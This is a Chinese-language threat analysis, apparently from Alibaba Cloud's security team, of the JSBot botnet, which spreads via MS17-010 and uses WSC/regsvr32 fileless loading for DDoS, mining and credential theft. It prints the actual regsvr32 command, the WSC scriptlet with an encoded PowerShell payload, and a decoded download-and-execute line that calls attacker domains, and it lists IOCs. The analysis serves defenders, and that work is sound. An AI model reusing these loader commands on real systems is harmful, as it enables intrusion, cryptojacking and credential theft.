备案控制台
开发者社区 开发与运维 文章 正文

JSBot无文件攻击,云安全网络全链路防御

2021-08-02 1681
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
.cn 域名,1个 12个月
云安全中心 云平台配置检查,900元 3000次
云安全中心 防病毒版,最高20核 3个月
简介: 近日,阿里云安全监测到一种利用Javascript无文件技术实现C&C通信的新型僵尸网络,其核心交互无文件落盘并由JS加载下载Powershell脚本内存执行各类恶意操作,阿里云安全专家分析发现,该僵尸网络利用永恒之蓝漏洞进行扫描入侵,对主机、用户资产危害极大。

概述


近日,阿里云安全监测到一种利用Javascript无文件技术实现C&C通信的新型僵尸网络,其核心交互无文件落盘并由JS加载下载Powershell脚本内存执行各类恶意操作,由于核心使用了WSC技术我们将其命名为JSBot。


阿里云安全专家分析发现,该僵尸网络利用永恒之蓝漏洞进行扫描入侵,通过WSC(Windows Scripting Component)技术下载并执行核心Powershell脚本,实现文件下载、上传、对外DDoS、挖矿、盗取密码等功能,对主机、用户资产危害极大。


阿里云安全持续对该BOT进行监控,发现近期传播有所上升,提醒广大用户注意防护。1627550750329-c997bf7a-ab95-4958-86d8-5c5f65f5757c.png

传播手段


JSBOT通过MS17-010漏洞进行入侵和传播,利用WSC技术实现无文件化的维持和后续攻击,通过从云端下载经过编码的二进制文件,实现对外DDoS和挖矿行为,通过Powershell核心函数实现对失陷主机的下载、发送文件、WMIExec等功能。


20210730141455.jpg

阶段分析


20210730141616.jpg


详细分析


JSBot通过MS17-010漏洞入侵主机内部后,通过进行svchost.exe执行命令派生cmd进程。该命令从域名cat.xiaoshabi.nl下载一段XML文件,该文件使用JavaScript编写的COM组件WSC(Windows Scripting Component),由于脚本文件不能被编译,只能运行于Windows系统的脚本宿主机WSH(Windows Scripting Host)中,全程文件不落盘,这也给文件查杀、木马清理带来了难度。其执行的命令如下:


C:\\Windows\\system32\\regsvR32.EXE /u/s/i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll


文件名为networks.xsl的XML文件内容如下,通过新建 ActiveXObject("WScript.Shell").Run(ps,0,true) 执行一段powershell经过Base64加密的脚本


<?XML version="1.0"?>

<scriptlet>

<registration

    progid="Test"

    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >

    <!-- Learn from Casey Smith @subTee -->

    <script language="JScript">

        <![CDATA[

            ps  = "cmd.exe /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBzAGkAeAAuAHgAaQBhAG8AagBpAGoAaQAuAG4AbAAvAG4AZQB0AHcAbwByAGsAcwAuAHAAcwAxACcAKQApAA==";             new ActiveXObject("WScript.Shell").Run(ps,0,true);

        ]]>

</script>

</registration>

</scriptlet>


其中命令部分经base64解码后内容如下,JSBot从 six.xiaojiji.nl 域名下载进过混淆的脚本 networks.ps1


IEX ((new-object net.webclient).downloadstring('http://six.xiaojiji.nl/networks.ps1'))


networks.ps1包含三个参数,参数经过过base64或混淆


20210730142010.jpg

对文件进行解码后参数功能可以归结如下20210730142057.jpg

$ffffff解码出的核心函数

函数Download_File,调用[System.IO.File]::WriteAllBytes("$env:temp$Filename", $temp)从失陷主机下载文件

20210730142208.jpg

函数RunDDOS,从 http://xxx.xxx.xxx.xxx/cohernece.txt 下载DDOS文件到C:\Windows\TEMP\cohernece.exe目录并执行

20210730142250.jpg

函数RunXMR,从 http://xxx.xxx.xxx.xxx/steam.txt 下载挖矿木马并执行20210730142328.jpg

函数Get-creds,盗取内存中的秘钥

20210730142509.jpg

函数Scan,利用MS17-010对外进行扫描

20210730142549.jpg

整体解码后可以得到JSBot如下核心功能

20210730142632.jpg

$miiiiii参数解码二进制

Dll导出函数中包含powershell_reflective_mimikatz

20210730142738.jpg

文件中对该Mimikatz工具进行了集成

20210730142820.jpg

逃逸手段分析

JSBot为了规避检测在整体流程中采用了多种组合方式,其中比较典型的有以下几类

无文件内存化运行

JSBot通过regsvR32执行命令,调用scrobj.dll的DllInstall函数,将URL中所带的COM组件写入注册表中,由于脚本运行于Windows平台上的脚本宿主机WSH(Widnows Scripting Host),故文件可以不落盘。

C:\\Windows\\system32\\regsvR32.EXE /u/s/i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll


而在Powershell脚本中JSBot通过一系列函数在内存空间中将PE写入,同样实现了无文件落盘的操作,如图写内存函数

20210730142956.jpg

程序执行入口

20210730143033.jpg

JSBot使用WMIExec来远程执行命令,Windows系统默认不会在日志中记录这些操作,可以做到无日志,攻击脚本无需写入磁盘。

20210730143117.jpg

脚本多层多类型混淆

JSBot对核心函数做了两次混淆,核心功能在参数$ffffff中,同时针对Powershell使用了任意大小写、反引号、拼接等多种混淆手段,增加分析和检测难度。

20210730143209.jpg

二进制编码内存还原

JSBot从远程服务下载二进制时,对二进制文件进行了文本化,以逃避网络侧流量的检测,在脚本中再进行解码还原,如下为下载的DDoS木马。

20210730143303.jpg

Powershell中对二进制文件进行还原函数如下

20210730143409.jpg

安全解决方案

云防火墙利用图计算结合流实时计算,可以在近实时对攻击报文进行分析,依赖图计算存储的亿级IOC节点对外联IP、域名、URL进行团伙化标签,依托流实时化分析系统得到团伙攻击Payload、攻击URL、攻击端口等信息,有效提升对蠕虫木马类攻击的检测防御能力。当前云防火墙支持对JSBOT进行防御与检测。


20210730143605.jpg

云防火墙主动外联功能结合阿里云千万级别活跃IP、域名威胁情报库(包含勒索软件、间谍软件、僵尸网络、木马后门等分类),对外联IP、域名进行实时监控,通过“建议操作”可以查看实时流量日志或通过智能策略对外联、域名进行管控、封禁,保障您的资产不遭受更大的损失。

20210730143807.jpg

IOC

IP

5.180.96.187

Domain

cat.dashabi.in

skt.dashabi.nl

safe.lxb.monster

cat.xiaojiji.nl

skt.xiaojiji.nl

sec.xiaojiji.nl

URL

hxxp://cat.dashabi.in/networks.xsl

hxxp://sec.dashabi.in/javaw2/net/net.xsl

hxxp://sec.dashabi.in/javaw2/instance.xsl

hxxp://skt.dashabi.nl/networks.xsl

hxxp://cat.xiaojiji.nl/cohernece.txt

hxxp://cat.xiaojiji.nl/sys.txt

hxxp://skt.xiaojiji.nl/ver.txt

hxxp://cat.xiaojiji.nl/access.txt

hxxp://cat.xiaojiji.nl/monhash.txt

hxxp://cat.xiaojiji.nl/net/net.xsl

hxxp://cat.xiaojiji.nl/minhash.txt

hxxp://cat.xiaojiji.nl/nssmhash.txt

hxxp://cat.xiaojiji.nl/uas.txt

hxxp://cat.xiaojiji.nl/nssm.txt

hxxp://cat.xiaojiji.nl/ver.txt

hxxp://cat.xiaojiji.nl/min.txt

hxxp://cat.xiaojiji.nl/mon.txt

hxxp://sec.xiaojiji.nl/javaw2/instance.ps1

hxxp://sec.xiaojiji.nl/javaw2/javaw

hxxp://sec.xiaojiji.nl/javaw2/WinRing0x64.sys

hxxp://cat.xiaojiji.nl/networks.ps1

hxxp://cat.xiaojiji.nl/networks.xsl

hxxp://cat.xiaojiji.nl:80/net/net.xsl

hxxp://sec.xiaojiji.nl/javaw2/net/net.xsl

hxxp://six.xiaojiji.nl/networks.ps1

hxxp://six.xiaojiji.nl/networks.xsl

hxxp://skt.xiaojiji.nl/list.ps1

hxxp://skt.xiaojiji.nl/networke.ps1

hxxp://skt.xiaojiji.nl/networke.xsl

hxxp://skt.xiaojiji.nl/networks.ps1

hxxp://skt.xiaojiji.nl/networks.xsl

hxxp://safe.lxb.monster/networke.xsl

hxxp://safe.lxb.monster/networks.xsl

MD5

fdf5976964d0c42e4f5b490a2a7dd0c6

8c26218931c743a36987e07af7fc35f4

0ef5da9757386de38b1eb20e1ba0dc45

文章标签:
云安全中心
DDoS防护
域名
JavaScript
前端开发
图计算
监控
Windows
云安全
网络安全
安全
数据格式
XML
关键词:
网络文件
网络防御
文件网络
云安全中心攻击
云安全中心防御
云安全专家
目录
相关文章
游客uul6wusao3sds
|
2天前
|
存储 安全 网络安全
构筑防御堡垒:云计算环境下的网络安全策略与实践
【5月更文挑战第59天】 随着企业逐渐将数据和服务迁移至云端,云计算的安全性成为不容忽视的关键问题。本文深入探讨了在动态且复杂的云环境中如何有效实施网络安全策略,确保数据的保密性、完整性和可用性。通过分析当前云服务面临的安全威胁,结合最新的信息安全技术和最佳实践,本文提出了一系列切实可行的防御措施,并讨论了如何在保障业务连续性的同时提升系统的整体安全性能。
游客uul6wusao3sds
11 2
shuj
|
3天前
|
SQL 安全 算法
网络安全漏洞与防御策略:保护信息安全的前沿技术
【6月更文挑战第26天】在数字化时代,网络安全成为维护个人隐私和组织资产的关键防线。本文深入探讨了网络安全中常见的漏洞类型、加密技术的进展以及提升安全意识的重要性。通过分析最新的防御机制和安全实践,旨在为读者提供一套全面的网络安全知识框架,强调预防措施的必要性并促进一个更加安全的网络环境。
shuj
8 3
花开富贵111
|
3天前
|
存储 编解码 API
视觉智能开放平台产品使用合集之如何处理本地文件或网络文件链接
视觉智能开放平台是指提供一系列基于视觉识别技术的API和服务的平台,这些服务通常包括图像识别、人脸识别、物体检测、文字识别、场景理解等。企业或开发者可以通过调用这些API,快速将视觉智能功能集成到自己的应用或服务中,而无需从零开始研发相关算法和技术。以下是一些常见的视觉智能开放平台产品及其应用场景的概览。
花开富贵111
10 1
aliyun8599273441-30642
|
5天前
|
云安全 监控 安全
云上防御:云计算时代的网络安全策略
【6月更文挑战第24天】在云计算的浪潮中,企业与个人用户纷纷将数据和应用迁移到云端,享受其带来的便利与效率。然而,伴随而来的网络安全挑战也日益严峻。本文深入探讨了云计算环境下的网络安全问题,分析了云服务模型的安全特性,并提出了相应的安全策略和最佳实践。通过案例分析,文章揭示了在云计算环境中维护信息安全的重要性,并指出了未来云安全技术发展的方向。
aliyun8599273441-30642
16 3
请看我回答~
|
6天前
|
SQL 安全 网络安全
网络防御的盾牌:深入探索网络安全漏洞与先进加密技术
【6月更文挑战第23天】在数字时代的浪潮下,网络安全成为维护信息安全的关键防线。本文将剖析当前网络安全面临的主要漏洞,探讨如何通过先进的加密技术和提升安全意识来构建坚固的网络防御体系。我们将从网络攻击者的角度出发,了解他们利用的漏洞类型,并介绍一些实用的防御策略。文章还将深入讨论加密技术的演变,以及如何正确应用这些技术来保护数据。最后,强调培养良好的安全习惯和提高个人及组织的安全意识对于预防网络威胁的重要性。
请看我回答~
18 3
请看我回答~
|
8天前
|
SQL 安全 网络安全
网络防御的盾牌:探索网络安全漏洞、加密技术与安全意识的重要性
【6月更文挑战第21天】在数字时代,网络安全已成为保护个人隐私和企业资产的关键。本文将深入探讨网络安全中的薄弱环节,包括常见的安全漏洞及其成因,同时介绍加密技术如何成为防御策略的核心。此外,文章强调了提高用户安全意识的必要性,并提出了实用的建议来增强个人和组织的网络防御能力。通过这些措施,我们可以更好地保护自己免受网络威胁的侵害。
请看我回答~
14 5
游客uul6wusao3sds
|
11天前
|
存储 安全 网络安全
构筑防御堡垒:云计算环境中的网络安全策略
【5月更文挑战第50天】 在数字化转型的浪潮中,云计算已成为支撑企业运营的重要基石。然而,随着数据量的激增和云服务的普及,网络安全威胁也随之增加。本文将深入探讨云计算环境中的网络安全挑战,并提出一系列创新的安全策略来强化信息安全防线。通过分析当前云服务的安全漏洞、网络攻击手段以及合规性要求,我们将探索如何构建一个既灵活又强大的安全框架,以保护云基础设施和敏感数据不受网络威胁影响。
游客uul6wusao3sds
31 8
葛淼罡
|
6天前
|
机器学习/深度学习 算法 网络安全
机器学习在网络安全威胁检测与防御中有广泛的应用
机器学习在网络安全威胁检测与防御中有广泛的应用
葛淼罡
12 1
游客qf4jmczx4xu2y
|
10天前
|
存储 SQL 安全
网络安全的盾牌:漏洞、加密与意识的综合防御
【6月更文挑战第19天】在数字信息的海洋中,网络安全是守护数据宝藏的坚固盾牌。本文将探讨网络安全的三大支柱:网络漏洞、加密技术以及安全意识,揭示它们如何共同构筑起一道防线,保护我们的信息安全不受侵犯。我们将深入分析常见的网络漏洞,探索现代加密技术的奥秘,并强调培养良好的安全意识的重要性。这不仅是技术人员的战斗,每个人都是这场保卫战的战士。让我们揭开网络安全的面纱,一探究竟。
游客qf4jmczx4xu2y
19 4
weixin_836869520
|
9天前
|
存储 安全 JavaScript
【网络安全】CSRF攻击详解
【网络安全】CSRF攻击详解
weixin_836869520
28 1

热门文章

最新文章

  • 1
    深度学习中的卷积神经网络(CNN)详解
  • 2
    网络安全与信息安全:防范漏洞、加强加密与提升安全意识
  • 3
    基于深度学习网络的鞋子种类识别matlab仿真
  • 4
    智能化运维:AIOps在未来网络管理中的应用与挑战
  • 5
    网络安全与信息安全:保护您的数据和隐私
  • 6
    云计算与网络安全:保障信息安全的新挑战与应对策略
  • 7
    SPSS大学生网络购物行为研究:因子分析、主成分、聚类、交叉表和卡方检验
  • 8
    2023年河南省中等职业教育技能大赛网络建设与运维项目比赛试题(一)
  • 9
    R语言软件对房屋价格预测:回归、LASSO、决策树、随机森林、GBM、神经网络和SVM可视化|数据分享
  • 10
    网络安全攻防实战演练:技术探索与实践
  • 1
    网络安全 | 什么是云安全?
    62
  • 2
    云安全中心产品优势
    26
  • 3
    带你读《从基础到应用云上安全航行指南》——云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环(1)
    171
  • 4
    带你读《从基础到应用云上安全航行指南》——云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环(2)
    126
  • 5
    带你读《从基础到应用云上安全航行指南》——云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环(3)
    158
  • 6
    云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环
    74023
  • 7
    云安全中的常见云漏洞和威胁,有哪些防范措施
    277
  • 8
    云:云安全实践
    30
  • 9
    云安全:如何构建安全团队
    55
  • 10
    瑞数信息再度入选Gartner中国云安全资源池代表厂商
    65

    • 相关课程

    更多
  • TCP/IP 网络基础
  • 云计算工程师解析与实战-网络专家篇(体验版)
  • 云网络白皮书-阿里云网络系列课
  • 企业上云攻略-阿里云网络产品应用系列教程
  • Linux网络进阶 - TCP/IP协议及OSI七层模型
  • 网络管理者必知-2分钟了解新出台的《网络安全法》

    • 相关电子书

    更多
  • 可编程网络视角的网络创新研究
  • 可编程网络和SDN3.0
  • 开放促进创新:构建开放网络生态

    • 相关实验场景

    更多
  • 物联网设备安全:实时检测7类安全风险(Agentless)
  • 容器的网络入门
  • 容器的自定义网络
  • 容器的共享网络模型
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)